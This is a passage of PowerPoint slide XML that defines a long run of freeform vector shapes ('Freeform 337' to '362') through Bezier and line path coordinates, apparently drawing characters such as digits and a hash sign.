                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="62"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="67"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="64"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="44"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71" y="46"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="41"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="44"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="99" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="39"/>
                      <a:pt x="97"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Freeform 337"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="1518"/>
                <a:ext cx="3" cy="4"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 3"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 2"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 0 w 2"/>
                  <a:gd name="T7" fmla="*/ 1 h 3"/>
                  <a:gd name="T8" fmla="*/ 2 w 2"/>
                  <a:gd name="T9" fmla="*/ 0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2" y="1"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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Freeform 338"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="1518"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 3"/>
                  <a:gd name="T3" fmla="*/ 1 h 2"/>
                  <a:gd name="T4" fmla="*/ 3 w 3"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 2 w 3"/>
                  <a:gd name="T7" fmla="*/ 2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cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="2"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>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Freeform 339"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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0" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21"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Freeform 340"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 341"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 342"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 343"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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Freeform 344"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 345"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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40"/>
                      <a:pt x="31" y="42"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14"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Freeform 346"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="1833"/>
                <a:ext cx="155"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8" y="192"/>
                      <a:pt x="89"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Freeform 347"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 348"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 349"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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7"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Freeform 350"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 351"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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40"/>
                      <a:pt x="31" y="42"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="19"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Freeform 352"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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2" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="11" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="29" y="12"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="3"/>
                      <a:pt x="55"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Freeform 353"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="1838"/>
                <a:ext cx="187" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 219"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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19">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 354"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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5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Freeform 355"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137" y="183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7" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="27"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Freeform 356"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="1833"/>
                <a:ext cx="154" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 144 h 203"/>
                  <a:gd name="T4" fmla="*/ 110 w 127"/>
                  <a:gd name="T5" fmla="*/ 177 h 203"/>
                  <a:gd name="T6" fmla="*/ 89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4" y="185"/>
                      <a:pt x="97" y="192"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="192"/>
                      <a:pt x="21" y="186"/>
                      <a:pt x="16" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="169"/>
                      <a:pt x="6"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5"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Freeform 357"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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2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Freeform 358"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5631"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4" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="157"/>
                      <a:pt x="116" y="168"/>
                      <a:pt x="111" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="192"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="201"/>
                      <a:pt x="73" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="44" y="201"/>
                      <a:pt x="36" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="186"/>
                      <a:pt x="16" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="89"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="5" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="12" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="3"/>
                      <a:pt x="56" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="128" y="34"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="92"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Freeform 359"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828" y="183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5 h 201"/>
                  <a:gd name="T14" fmla="*/ 0 w 68"/>
                  <a:gd name="T15" fmla="*/ 32 h 201"/>
                  <a:gd name="T16" fmla="*/ 16 w 68"/>
                  <a:gd name="T17" fmla="*/ 26 h 201"/>
                  <a:gd name="T18" fmla="*/ 32 w 68"/>
                  <a:gd name="T19" fmla="*/ 19 h 201"/>
                  <a:gd name="T20" fmla="*/ 47 w 68"/>
                  <a:gd name="T21" fmla="*/ 10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40"/>
                      <a:pt x="31" y="42"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="11" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="47" y="10"/>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Freeform 360"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5977"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Freeform 361"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172" y="1833"/>
                <a:ext cx="156" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 128"/>
                  <a:gd name="T3" fmla="*/ 144 h 203"/>
                  <a:gd name="T4" fmla="*/ 110 w 128"/>
                  <a:gd name="T5" fmla="*/ 177 h 203"/>
                  <a:gd name="T6" fmla="*/ 90 w 128"/>
                  <a:gd name="T7" fmla="*/ 196 h 203"/>
                  <a:gd name="T8" fmla="*/ 62 w 128"/>
                  <a:gd name="T9" fmla="*/ 203 h 203"/>
                  <a:gd name="T10" fmla="*/ 36 w 128"/>
                  <a:gd name="T11" fmla="*/ 197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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="192"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="36"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8" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="3"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="128" y="34"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="91" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="48"/>
                      <a:pt x="23" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="158"/>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Freeform 362"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="1838"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
